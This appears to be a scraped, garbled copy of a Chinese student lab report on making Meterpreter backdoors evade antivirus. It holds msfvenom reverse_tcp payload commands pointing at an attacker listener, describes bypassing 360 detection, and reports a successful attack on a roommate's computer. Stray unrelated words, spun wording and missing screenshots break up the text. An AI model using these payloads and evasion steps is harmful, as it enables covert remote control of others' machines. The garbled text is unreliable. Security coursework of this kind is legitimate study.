msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.109 lport=5213 x> 5213_backjar.jar
本身利用shellcode编程等免杀工具或技巧java
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=443 -f c
在本身的codeblocks上编译运行,360出现了警告,将其添加到信任中便可
python
放到网上测试以后的结果只有百分之二十的识别出来了:
shell
运行结果再次成功:
编程
360木马查杀结果:
windows
本机用的是奇虎360安全卫士,上图能够看得出来,这个任务我是在室友的电脑上作的,它用的是安全管家:
安全
下图是扫描的结果:
tcp
在同连寝室网的环境下,攻击成功:
工具
(1)杀软是如何检测出恶意代码的?测试
* 分析恶意程序的行为特征,分析其代码流将其性质归类于恶意代码
(2)免杀是作什么?编码
* 使恶意代码避免被查杀,也就是要掩盖恶意代码的特征
(3)免杀的基本方法有哪些?
* 免杀大概能够分为两种状况: 1. 二进制的免杀(无源码),只能经过经过修改asm代码/二进制数据/其余数据来完成免杀。 2. 有源码的免杀,能够经过修改源代码来完成免杀,也能够结合二进制免杀的技术。 * 免杀也能够分为这两种状况: 1. 静态文件免杀,被杀毒软件病毒库/云查杀了,也就是文件特征码在病毒库了。 2. 动态行为免杀,运行中执行的某些行为被杀毒软件拦截报读。
* 要想保证本身的计算机环境安全,不能简单的彻底信任杀毒软件,保不齐杀毒软件谦虚了一下,计算机就可能中毒了。 * 离实战还缺些什么技术或步骤? * 将后门程序注入受害机,以及让其如何自启动。